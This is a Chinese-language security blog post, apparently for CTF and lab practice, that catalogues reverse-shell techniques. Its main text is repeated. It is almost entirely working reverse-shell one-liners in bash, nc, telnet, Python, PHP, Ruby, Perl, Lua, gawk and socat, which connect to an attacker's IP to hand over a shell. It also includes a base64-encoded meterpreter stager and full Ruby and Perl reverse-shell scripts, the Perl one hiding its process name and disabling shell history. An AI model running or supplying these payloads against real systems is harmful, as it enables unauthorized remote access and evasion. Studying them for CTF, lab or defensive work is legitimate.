反弹shell的各种姿势

博主： Tr0jAn
发布时间：2020 年 08 月 15 日
2810次浏览
暂无评论
8052字数
分类：内网靶机

反弹shell的各种姿势

bash

# 法一：
bash -i >& /dev/tcp/ip/port 0>&1
# 法二：
/bin/bash  -i > /dev/tcp/ip/port 0<&1 2>&1

exec

# 法一：
exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done
# 法二：
exec 2>&0 0<&196;exec 196<>/dev/tcp/ip/port; sh <&196 >&196 2>&196

nc(NetCat)

# 需要检查靶机是否安装nc
# 法一： 不同版本的nc不一定支持-e选项
nc -e /bin/bash ip port
# 法二：
/bin/sh | nc ip port
# 法三：
mknod backpipe p && nc ip port 0<backpipe | /bin/bash 1>backpipe
# 法四：
nc  ip 输入port  |  /bin/bash  |  nc ip 输出port
# 法五：
rm -f /tmp/p; mknod /tmp/p p && nc ip port 0/tmp/
# 法六：当nc版本问题时
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f

telnet

# 法一：同nc法二
telnet ip 输入port | /bin/bash | telnet ip 输出port
# 法二：
rm -f /tmp/p; mknod /tmp/p p && telnet ip port 0/tmp/p
# 法三：nc不可用或者/dev/tcp不可用时
mknod backpipe p && telnet ip port 0<backpipe | /bin/bash 1>backpipe

python

# 法一：
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
# 法二：
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('ip',port))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
# 法三：Metasploit + python
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=ip LPORT=port
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

php

# 法一：
php -r 'exec("/bin/bash -i >& /dev/tcp/ip/port");'
# 法二：
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'

ruby

# 法一：不常用
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# 法二：不依赖/bin/sh
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# 法三：适用windows
ruby -rsocket -e 'c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# 法四：完整ruby反弹shell脚本(MSF模块自带)
#!/usr/bin/env ruby

require 'socket'
require 'open3'

#Set the Remote Host IP
RHOST = "192.168.1.10" 
#Set the Remote Host Port
PORT = "6667"

#Tries to connect every 20 sec until it connects.
begin
sock = TCPSocket.new "#{RHOST}", "#{PORT}"
sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

#Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
              IO.copy_stream(stdout_and_stderr, sock)
              end  
  end
rescue
  retry
end

perl

# 法一：
perl -e 'use Socket;$i="192.168.32.135";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# 法二：不依赖 /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 
# 法三：
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# 法四：完整perl反弹shell脚本
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
my $ip = '127.0.0.1';
my $port = 1234;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any
        # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

lua

# 法一：
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"
# 法二：
lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('ip',port);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"

Xterm(未验证)

首先开启Xserver：　　# TCP 6001

Xnest :1               # Note: The command starts with uppercase X

授予目标机连回来的权限：

xterm -display 127.0.0.1:1          # Run this OUTSIDE the Xnest, another tab
xhost +targetip                         # Run this INSIDE the spawned xterm on the open X Server

如果想让任何人都连上：

xhost +                     # Run this INSIDE the spawned xterm on the open X Server

假设xterm已安装，连回你的Xserver：

xterm -display attackerip:1

或者：

$ DISPLAY=attackerip:0 xterm

gawk(未验证)

#!/usr/bin/gawk -f

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}

socat(未验证)

tcp

接收端输入：

./socat TCP-LISTEN:ip -

发送端输入：

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip:port

udp

socat udp-connect:攻击者ip:端口 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &

MSF

1.msconsole      管理生成的exp  管理反弹的shell  通过反弹的shell进行后渗透。。。。
2.msfvenom       制作木马
3.msfencode      对木马进行编码
4.Auxiliary      辅助模块
5.meterpreter    连接

从原生的 shell 环境切换到 linux 的交互式 bash 环境

python -c 'import pty; pty.spawn("/bin/bash")'

最后修改：2020 年 08 月 15 日 10 : 00 PM

请作者喝杯奶茶吧~

发表评论取消回复

评论 *

私密评论

名称 *

邮箱 *

地址

SSRF漏洞入门
浏览次数: 8547
巅峰极客2020部分write up
浏览次数: 6346
php://filter一些奇技淫巧
浏览次数: 5951
SSTI-模板注入
浏览次数: 5888
从几个CTF题目学习内存取证(一)
浏览次数: 5472

hmv[-_-]wild R11; starsea-blog-成长见证
[...]https://tr0jan.top/archive...
0xff
师傅题目镜像还有吗？可以发一份学习吗
http://andere.strikingly.com/
You mentioned that wonderfully!
газовый котел напольный
Truly many of valuable tips!
41ien
背景太花了，挺影响阅读的(ó﹏ò｡)

DC系列靶机(DC-1)
浏览次数: 2653
[攻防世界]php-rce
浏览次数: 1998
[强网杯 2019]高明的黑客
浏览次数: 5168
PHP伪随机数
浏览次数: 3034
Upload-labs笔记
浏览次数: 2492

反弹shell的各种姿势

Tr0jAn • 2020 年 08 月 15 日

反弹shell的各种姿势

bash

# 法一：
bash -i >& /dev/tcp/ip/port 0>&1
# 法二：
/bin/bash  -i > /dev/tcp/ip/port 0<&1 2>&1

exec

# 法一：
exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done
# 法二：
exec 2>&0 0<&196;exec 196<>/dev/tcp/ip/port; sh <&196 >&196 2>&196

nc(NetCat)

# 需要检查靶机是否安装nc
# 法一： 不同版本的nc不一定支持-e选项
nc -e /bin/bash ip port
# 法二：
/bin/sh | nc ip port
# 法三：
mknod backpipe p && nc ip port 0<backpipe | /bin/bash 1>backpipe
# 法四：
nc  ip 输入port  |  /bin/bash  |  nc ip 输出port
# 法五：
rm -f /tmp/p; mknod /tmp/p p && nc ip port 0/tmp/
# 法六：当nc版本问题时
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f

telnet

# 法一：同nc法二
telnet ip 输入port | /bin/bash | telnet ip 输出port
# 法二：
rm -f /tmp/p; mknod /tmp/p p && telnet ip port 0/tmp/p
# 法三：nc不可用或者/dev/tcp不可用时
mknod backpipe p && telnet ip port 0<backpipe | /bin/bash 1>backpipe

python

# 法一：
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
# 法二：
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('ip',port))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
# 法三：Metasploit + python
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=ip LPORT=port
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

php

# 法一：
php -r 'exec("/bin/bash -i >& /dev/tcp/ip/port");'
# 法二：
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'

ruby

# 法一：不常用
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# 法二：不依赖/bin/sh
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# 法三：适用windows
ruby -rsocket -e 'c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# 法四：完整ruby反弹shell脚本(MSF模块自带)
#!/usr/bin/env ruby

require 'socket'
require 'open3'

#Set the Remote Host IP
RHOST = "192.168.1.10" 
#Set the Remote Host Port
PORT = "6667"

#Tries to connect every 20 sec until it connects.
begin
sock = TCPSocket.new "#{RHOST}", "#{PORT}"
sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

#Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
              IO.copy_stream(stdout_and_stderr, sock)
              end  
  end
rescue
  retry
end

perl

# 法一：
perl -e 'use Socket;$i="192.168.32.135";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# 法二：不依赖 /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 
# 法三：
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# 法四：完整perl反弹shell脚本
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
my $ip = '127.0.0.1';
my $port = 1234;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any
        # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

lua

# 法一：
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"
# 法二：
lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('ip',port);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"

Xterm(未验证)

首先开启Xserver：　　# TCP 6001

Xnest :1               # Note: The command starts with uppercase X

授予目标机连回来的权限：

xterm -display 127.0.0.1:1          # Run this OUTSIDE the Xnest, another tab
xhost +targetip                         # Run this INSIDE the spawned xterm on the open X Server

如果想让任何人都连上：

xhost +                     # Run this INSIDE the spawned xterm on the open X Server

假设xterm已安装，连回你的Xserver：

xterm -display attackerip:1

或者：

$ DISPLAY=attackerip:0 xterm

gawk(未验证)

#!/usr/bin/gawk -f

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}

socat(未验证)

tcp

接收端输入：

./socat TCP-LISTEN:ip -

发送端输入：

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip:port

udp

socat udp-connect:攻击者ip:端口 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &

MSF

1.msconsole      管理生成的exp  管理反弹的shell  通过反弹的shell进行后渗透。。。。
2.msfvenom       制作木马
3.msfencode      对木马进行编码
4.Auxiliary      辅助模块
5.meterpreter    连接

从原生的 shell 环境切换到 linux 的交互式 bash 环境

python -c 'import pty; pty.spawn("/bin/bash")'

反弹shell的各种姿势

bash

exec

nc(NetCat)

telnet

python

php

ruby

perl

lua

Xterm(未验证)

gawk(未验证)

socat(未验证)

tcp

udp

MSF

从原生的 shell 环境切换到 linux 的交互式 bash 环境

发表评论 取消回复

反弹shell的各种姿势

反弹shell的各种姿势

bash

exec

nc(NetCat)

telnet

python

php

ruby

perl

lua

Xterm(未验证)

gawk(未验证)

socat(未验证)

tcp

udp

MSF

从原生的 shell 环境切换到 linux 的交互式 bash 环境

发表评论取消回复